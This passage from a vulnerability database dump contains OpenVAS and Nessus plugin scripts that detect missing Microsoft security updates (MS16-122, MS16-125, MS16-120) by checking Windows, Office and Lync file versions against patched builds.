but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809063\");\n script_version(\"2020-06-08T14:40:48+0000\");\n script_cve_id(\"CVE-2016-0142\");\n script_bugtraq_id(93378);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 14:40:48 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 08:50:54 +0530 (Wed, 12 Oct 2016)\");\n script_name(\"Microsoft Video Control Remote Code Execution Vulnerability (3195360)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS16-122\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists when Microsoft Video Control\n fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attacker to run arbitrary code in the context of the current user and could\n take control of the affected system if the current user is logged on with\n administrative user rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Vista x32/x64 Service Pack 2\n\n - Microsoft Windows 7 x32/x64 Service Pack 1\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows 10 x32/x64\n\n - Microsoft Windows 10 Version 1511 x32/x64\n\n - Microsoft Windows 10 Version 1607 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3195360\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/library/security/MS16-122\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-122\");\n\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, win7:2, win7x64:2, winVistax64:3, win8_1:1, win8_1x64:1,\n win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nvidPath = smb_get_system32root();\nif(!vidPath ){\n exit(0);\n}\n\nvidVer = fetch_file_version(sysPath: vidPath, file_name:\"msvidctl.dll\");\nedgVer = fetch_file_version(sysPath: vidPath, file_name:\"edgehtml.dll\");\nif(!vidVer && !edgVer){\n exit(0);\n}\n\nif (vidVer =~ \"^6\\.5\\.6002\\.1\"){\n Vulnerable_range = \"Less than 6.5.6002.19689\";\n}\nelse if (vidVer =~ \"^6\\.5\\.6002\\.2\"){\n Vulnerable_range = \"6.5.6002.23000 - 6.5.6002.24013\";\n}\nelse if (vidVer =~ \"^6\\.5\\.7601\"){\n Vulnerable_range = \"Less than 6.5.7601.23544\";\n}\nelse if (vidVer =~ \"^6\\.5\\.9600\\.1\"){\n Vulnerable_range = \"Less than 6.5.9600.18464\";\n}\n\nif(hotfix_check_sp(winVista:3, winVistax64:3) > 0)\n{\n if(version_is_less(version:vidVer, test_version:\"6.5.6002.19689\")||\n version_in_range(version:vidVer, test_version:\"6.5.6002.23000\", test_version2:\"6.5.6002.24013\")){\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win7:2, win7x64:2) > 0)\n{\n ## Presently GDR information is not available.\n if(version_is_less(version:vidVer, test_version:\"6.5.7601.23544\")){\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n{\n if(version_is_less(version:vidVer, test_version:\"6.5.9600.18464\")){\n VULN = TRUE ;\n }\n}\n\nif(hotfix_check_sp(win10:1, win10x64:1) > 0)\n{\n if(version_is_less(version:edgVer, test_version:\"11.0.10240.17146\"))\n {\n Vulnerable_range1 = \"Less than 11.0.10240.17146\";\n VULN1 = TRUE ;\n }\n\n else if(version_in_range(version:edgVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.632\"))\n {\n Vulnerable_range1 = \"11.0.10586.0 - 11.0.10586.632\";\n VULN1 = TRUE ;\n }\n\n else if(version_in_range(version:edgVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.320\"))\n {\n Vulnerable_range1 = \"11.0.14393.0 - 11.0.14393.320\";\n VULN1 = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + vidPath + \"\\msvidctl.dll\" + '\\n' +\n 'File version: ' + vidVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nelse if(VULN1)\n{\n report = 'File checked: ' + vidPath + \"\\edgehtml.dll\" + '\\n' +\n 'File version: ' + edgVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:57:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7188"], "description": "This host is missing an important security\n update according to Microsoft Bulletin MS16-125.", "modified": "2019-12-20T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310809344", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809344", "type": "openvas", "title": "Microsoft Windows Diagnostics Hub Privilege Elevation Vulnerability (3193229)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Diagnostics Hub Privilege Elevation Vulnerability (3193229)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809344\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2016-7188\");\n script_bugtraq_id(93359);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 08:11:15 +0530 (Wed, 12 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Diagnostics Hub Privilege Elevation Vulnerability (3193229)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft Bulletin MS16-125.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An elevation of privilege vulnerability exists\n in the Windows Diagnostics Hub Standard Collector Service when the Windows\n Diagnostics Hub Standard Collector Service fails to properly sanitize input.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code with elevated system privileges. An attacker could then\n install programs, view, change, or delete data, or create new accounts with\n full user rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 x32/x64\n\n - Microsoft Windows 10 Version 1511 x32/x64\n\n - Microsoft Windows 10 Version 1607 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3194798\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3192441\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3192440\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-125\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/library/security/MS16-125\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!sysVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win10:1, win10x64:1) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"11.0.10240.17146\"))\n {\n Vulnerable_range = \"Less than 11.0.10240.17146\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:sysVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.632\"))\n {\n Vulnerable_range = \"11.0.10586.0 - 11.0.10586.632\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:sysVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.320\"))\n {\n Vulnerable_range = \"11.0.14393.0 - 11.0.14393.320\";\n VULN = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\edgehtml.dll\" + '\\n' +\n 'File version: ' + sysVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:43:53", "description": "The remote Windows host is missing a security update. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. A local attacker can exploit these\n vulnerabilities, via a specially crafted application, to\n predict memory offsets in a call stack and bypass the\n Address Space Layout Randomization (ASLR) feature,\n resulting in the disclosure of memory contents.\n (CVE-2016-3209, CVE-2016-3262, CVE-2016-3263)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this to elevate\n privileges and execute code in kernel mode.\n (CVE-2016-3270)\n\n - A remote code execution vulnerability exists in the\n Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this vulnerability by convincing a user to\n visit a specially crafted website or open a specially\n crafted file, resulting in the execution of arbitrary\n code in the context of the current user. (CVE-2016-3393)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker\n can exploit this vulnerability by convincing a user to\n visit a specially crafted website or open a specially\n crafted document file, resulting in the execution of\n arbitrary code in the context of the current user.\n (CVE-2016-3396)\n \n - An elevation of privilege vulnerability exists in the\n Windows GDI component due to improper handling of\n objects in memory. A local attacker can exploit this to\n elevate privileges and execute code in kernel mode.\n (CVE-2016-7182)", "edition": 32, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-12T00:00:00", "title": "MS16-120: Security Update for Microsoft Graphics Component (3192884)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3209", "CVE-2016-3396", "CVE-2016-3263", "CVE-2016-3393", "CVE-2016-7182", "CVE-2016-3270", "CVE-2016-3262"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:microsoft:skype_for_business", "cpe:/a:microsoft:lync_basic", "cpe:/o:microsoft:windows", "cpe:/a:microsoft:word_viewer", "cpe:/a:microsoft:silverlight", "cpe:/a:microsoft:.net_framework", "cpe:/a:microsoft:office", "cpe:/a:microsoft:lync_attendee", "cpe:/a:microsoft:live_meeting_console", "cpe:/a:microsoft:lync"], "id": "SMB_NT_MS16-120.NASL", "href": "https://www.tenable.com/plugins/nessus/94017", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94017);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\n \"CVE-2016-3209\",\n \"CVE-2016-3262\",\n \"CVE-2016-3263\",\n \"CVE-2016-3270\",\n \"CVE-2016-3393\",\n \"CVE-2016-3396\",\n \"CVE-2016-7182\"\n );\n script_bugtraq_id(\n 93377,\n 93380,\n 93385,\n 93390,\n 93394,\n 93395,\n 93403\n );\n script_xref(name:\"MSFT\", value:\"MS16-120\");\n script_xref(name:\"MSKB\", value:\"3191203\");\n script_xref(name:\"MSKB\", value:\"3192391\");\n script_xref(name:\"MSKB\", value:\"3185330\");\n script_xref(name:\"MSKB\", value:\"3192392\");\n script_xref(name:\"MSKB\", value:\"3185331\");\n script_xref(name:\"MSKB\", value:\"3192393\");\n script_xref(name:\"MSKB\", value:\"3185332\");\n script_xref(name:\"MSKB\", value:\"3192440\");\n script_xref(name:\"MSKB\", value:\"3192441\");\n script_xref(name:\"MSKB\", value:\"3194798\");\n script_xref(name:\"MSKB\", value:\"3188726\");\n script_xref(name:\"MSKB\", value:\"3189039\");\n script_xref(name:\"MSKB\", value:\"3189040\");\n script_xref(name:\"MSKB\", value:\"3188730\");\n script_xref(name:\"MSKB\", value:\"3188732\");\n script_xref(name:\"MSKB\", value:\"3188731\");\n script_xref(name:\"MSKB\", value:\"3188735\");\n script_xref(name:\"MSKB\", value:\"3189051\");\n script_xref(name:\"MSKB\", value:\"3189052\");\n script_xref(name:\"MSKB\", value:\"3188740\");\n script_xref(name:\"MSKB\", value:\"3188743\");\n script_xref(name:\"MSKB\", value:\"3188741\");\n script_xref(name:\"MSKB\", value:\"3118301\");\n script_xref(name:\"MSKB\", value:\"3118317\");\n script_xref(name:\"MSKB\", value:\"3118394\");\n script_xref(name:\"MSKB\", value:\"3118327\");\n script_xref(name:\"MSKB\", value:\"3118348\");\n script_xref(name:\"MSKB\", value:\"3188397\");\n script_xref(name:\"MSKB\", value:\"3188399\");\n script_xref(name:\"MSKB\", value:\"3188400\");\n script_xref(name:\"MSKB\", value:\"3189647\");\n script_xref(name:\"MSKB\", value:\"3193713\");\n script_xref(name:\"IAVA\", value:\"2016-A-0278\");\n\n script_name(english:\"MS16-120: Security Update for Microsoft Graphics Component (3192884)\");\n script_summary(english:\"Checks the version of win32k.sys.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. A local attacker can exploit these\n vulnerabilities, via a specially crafted application, to\n predict memory offsets in a call stack and bypass the\n Address Space Layout Randomization (ASLR) feature,\n resulting in the disclosure of memory contents.\n (CVE-2016-3209, CVE-2016-3262, CVE-2016-3263)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this to elevate\n privileges and execute code in kernel mode.\n (CVE-2016-3270)\n\n - A remote code execution vulnerability exists in the\n Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this vulnerability by convincing a user to\n visit a specially crafted website or open a specially\n crafted file, resulting in the execution of arbitrary\n code in the context of the current user. (CVE-2016-3393)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker\n can exploit this vulnerability by convincing a user to\n visit a specially crafted website or open a specially\n crafted document file, resulting in the execution of\n arbitrary code in the context of the current user.\n (CVE-2016-3396)\n \n - An elevation of privilege vulnerability exists in the\n Windows GDI component due to improper handling of\n objects in memory. A local attacker can exploit this to\n elevate privileges and execute code in kernel mode.\n (CVE-2016-7182)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/MS16-120\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, and 10. Additionally, Microsoft\nhas released a set of patches for Office 2007, Office 2010, Word\nViewer, Skype for Business 2016, Lync 2010, Lync 2013, Live Meeting\n2007 Console, .NET Framework 3.0 SP2, .NET Framework 3.5, .NET\nFramework 3.5.1, .NET Framework 4.5.2, .NET Framework 4.6, and\nSilverlight 5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-7182\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:word_viewer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_framework\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:skype_for_business\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:lync\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:lync_basic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:lync_attendee\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:live_meeting_console\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:silverlight\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"office_installed.nasl\", \"microsoft_lync_server_installed.nasl\", \"microsoft_net_framework_installed.nasl\", \"silverlight_detect.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS16-120';\nkbs = make_list(\n \"3191203\", # Windows Vista / 2008\n \"3192391\", # Windows 7 / 2008 R2 Security Only\n \"3185330\", # Windows 7 / 2008 R2 Monthly Rollup\n \"3192392\", # Windows 8.1 / 2012 R2 Security Only\n \"3185331\", # Windows 8.1 / 2012 R2 / RT 8.1 Monthly Rollup\n \"3192393\", # Windows 2012 Security Only\n \"3185332\", # Windows 2012 Monthly Rollup\n \"3192440\", # Windows 10 RTM\n \"3192441\", # Windows 10 1511\n \"3194798\", # Windows 10 1607\n \"3188726\", # .NET 3.0 SP2 Security Only\n \"3189039\", # .NET 4.5.2 Security Only\n \"3189040\", # .NET 4.6 Security Only\n \"3188730\", # .NET 3.5.1 Security Only\n \"3188732\", # .NET 3.5 on Windows 8.1 / 2012 R2 Security Only\n \"3188731\", # .NET 3.5 on Windows 2012 Security Only\n \"3188735\", # .NET 3.0 SP2 Monthly Rollup\n \"3189051\", # .NET 4.5.2 Monthly Rollup\n \"3189052\", # .NET 4.6 Monthly Rollup\n \"3188740\", # .NET 3.5.1 Monthly Rollup\n \"3188743\", # .NET 3.5 on Windows 8.1 / 2012 R2 Monthly Rollup\n \"3188741\", # .NET 3.5 on Windwos 2012 Monthly Rollup\n \"3118301\", # Office 2007 SP3\n \"3118317\", # Office 2010 SP2\n \"3118394\", # Office Word Viewer\n \"3118327\", # Skype for Biz 2016\n \"3118348\", # Lync 2013 SP1\n \"3188397\", # Lync 2010\n \"3188399\", # Lync 2010 Attendee (User level)\n \"3188400\", # Lync 2010 Attendee (Admin level)\n \"3189647\", # Live Meeting 2007 Console\n \"3193713\" # Silverlight 5\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nvuln = 0;\n\n# \"3191203\", # Windows Vista / 2008\n# \"3192391\", # Windows 7 / 2008 R2 Security Only\n# \"3185330\", # Windows 7 / 2008 R2 Monthly Rollup\n# \"3192392\", # Windows 8.1 / 2012 R2 Security Only\n# \"3185331\", # Windows 8.1 / 2012 R2 / RT 8.1 Monthly Rollup\n# \"3192393\", # Windows 2012 Security Only\n# \"3185332\", # Windows 2012 Monthly Rollup\n# \"3192440\", # Windows 10 RTM\n# \"3192441\", # Windows 10 1511\n# \"3194798\", # Windows 10 1607\nfunction windows_os_is_vuln()\n{\n if (\n # \"3194798\", # Windows 10 1607\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"10_2016\", bulletin:bulletin, rollup_kb_list:make_list(3194798)) ||\n\n # \"3192441\", # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"10_2016\", bulletin:bulletin, rollup_kb_list:make_list(3192441)) ||\n\n # \"3192440\", # Windows 10 RTM\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"10_2016\", bulletin:bulletin, rollup_kb_list:make_list(3192440)) ||\n\n # \"3192392\", # Windows 8.1 / 2012 R2 Security Only\n # \"3185331\", # Windows 8.1 / 2012 R2 / RT 8.1 Monthly Rollup\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"10_2016\", bulletin:bulletin, rollup_kb_list:make_list(3192392, 3185331)) ||\n\n # \"3192393\", # Windows 2012 Security Only\n # \"3185332\", # Windows 2012 Monthly Rollup\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"10_2016\", bulletin:bulletin, rollup_kb_list:make_list(3192393, 3185332)) ||\n\n # \"3192391\", # Windows 7 / 2008 R2 Security Only\n # \"3185330\", # Windows 7 / 2008 R2 Monthly Rollup\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"10_2016\", bulletin:bulletin, rollup_kb_list:make_list(3192391, 3185330)) ||\n\n # \"3191203\", # Windows Vista / 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.19693\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3191203\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.24017\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3191203\")\n ) vuln += 1;\n}\n\n\n# \"3118301\", # Office 2007 SP3\n# \"3118317\", # Office 2010 SP2\n# \"3118394\", # Office Word Viewer\nfunction office_is_vuln()\n{\n local_var office_versions, office_sp;\n local_var path;\n\n office_versions = hotfix_check_office_version();\n\n # 2010 SP2\n if (office_versions[\"14.0\"])\n {\n office_sp = get_kb_item(\"SMB/Office/2010/SP\");\n if (!isnull(office_sp) && office_sp == 2)\n {\n path = hotfix_append_path(path:hotfix_get_officecommonfilesdir(officever:\"14.0\"), value:\"\\Microsoft Shared\\Office14\");\n if (hotfix_check_fversion(file:\"Ogl.dll\", version:\"14.0.7174.5000\", min_version:\"14.0.0.0\", path:path, bulletin:bulletin, kb:\"3118317\", product:\"Microsoft Office 2010 SP2\") == HCF_OLDER)\n vuln++;\n }\n }\n\n # 2007 SP3\n if (office_versions[\"12.0\"])\n {\n office_sp = get_kb_item(\"SMB/Office/2007/SP\");\n if (office_sp == 3)\n {\n path = hotfix_append_path(path:hotfix_get_officecommonfilesdir(officever:\"12.0\"), value:\"\\Microsoft Shared\\Office12\");\n if (hotfix_check_fversion(file:\"Ogl.dll\", version:\"12.0.6757.5000\", min_version:\"12.0.0.0\", path:path, bulletin:bulletin, kb:'3118301', product:\"Microsoft Office 2007 SP3\") == HCF_OLDER)\n vuln++;\n }\n }\n\n # Word Viewer\n if (!empty_or_null(get_kb_list(\"SMB/Office/WordViewer/*/ProductPath\")))\n {\n path = hotfix_append_path(path:hotfix_get_officecommonfilesdir(officever:\"11.0\"), value:\"Microsoft Shared\\Office11\");\n if (hotfix_check_fversion(file:\"gdiplus.dll\", version:\"11.0.8435.0\", min_version:\"11.0.0.0\", path:path, bulletin:bulletin, kb:'3118394', product:\"Microsoft Word Viewer\") == HCF_OLDER)\n vuln++;\n }\n}\n\n# \"3118327\", # Skype for Biz 2016\n# \"3118348\", # Lync 2013 SP1\n# \"3188397\", # Lync 2010\n# \"3188399\", # Lync 2010 Attendee (User level)\n# \"3188400\", # Lync 2010 Attendee (Admin level)\n# \"3189647\", # Live Meeting 2007 Console\nfunction lync_is_vuln()\n{\n local_var lync_count, lync_installs, lync_install;\n\n lync_count = get_install_count(app_name:\"Microsoft Lync\");\n\n # Nothing to do\n if (int(lync_count) <= 0)\n return FALSE;\n\n lync_installs = get_installs(app_name:\"Microsoft Lync\");\n foreach lync_install (lync_installs[1])\n {\n if (\"Live Meeting 2007 Console\" >< lync_install[\"Product\"])\n {\n if (hotfix_check_fversion(file:\"pubutil.dll\", version:\"8.0.6362.262\", min_version:\"8.0.0.0\", path:lync_install[\"path\"], bulletin:bulletin, kb:\"3189647\", product:\"Live Meeting 2007 Console\") == HCF_OLDER)\n vuln++;\n }\n if (lync_install[\"version\"] =~ \"^4\\.0\\.\" && \"Server\" >!< lync_install[\"Product\"])\n {\n # Lync 2010\n if (\"Attendee\" >!< lync_install[\"Product\"])\n {\n if (hotfix_check_fversion(file:\"communicator.exe\", version:\"4.0.7577.4521\", min_version:\"4.0.0.0\", path:lync_install[\"path\"], bulletin:bulletin, kb:\"3188397\", product:\"Microsoft Lync 2010\") == HCF_OLDER)\n vuln++;\n }\n # Lync 2010 Attendee\n else if (\"Attendee\" >< lync_install[\"Product\"])\n {\n if (\"user level\" >< tolower(lync_install[\"Product\"])) # User\n {\n if (hotfix_check_fversion(file:\"MeetingJoinAxAOC.DLL\", version:\"4.0.7577.4521\", min_version:\"4.0.0.0\", path:lync_install[\"path\"], bulletin:bulletin, kb:\"3188399\", product:lync_install[\"Product\"]) == HCF_OLDER)\n vuln++;\n }\n else # Admin\n {\n if (hotfix_check_fversion(file:\"MeetingJoinAxAOC.DLL\", version:\"4.0.7577.4521\", min_version:\"4.0.0.0\", path:lync_install[\"path\"], bulletin:bulletin, kb:\"3188400\", product:lync_install[\"Product\"]) == HCF_OLDER)\n vuln++;\n }\n }\n }\n # Lync 2013\n else if (lync_install[\"version\"] =~ \"^15\\.0\\.\" && \"Server\" >!< lync_install[\"Product\"])\n {\n if (hotfix_check_fversion(file:\"Lync.exe\", version:\"15.0.4867.1000\", min_version:\"15.0.4700.1000\", path:lync_install[\"path\"], bulletin:bulletin, kb:\"3118348\", product:\"Microsoft Lync 2013 (Skype for Business)\") == HCF_OLDER)\n vuln++;\n }\n # Skype for Business 2016\n else if (lync_install[\"version\"] =~ \"^16\\.0\\.\" && \"Server\" >!< lync_install[\"Product\"])\n {\n # Office 365 Deferred channel\n if (lync_install['Channel'] == 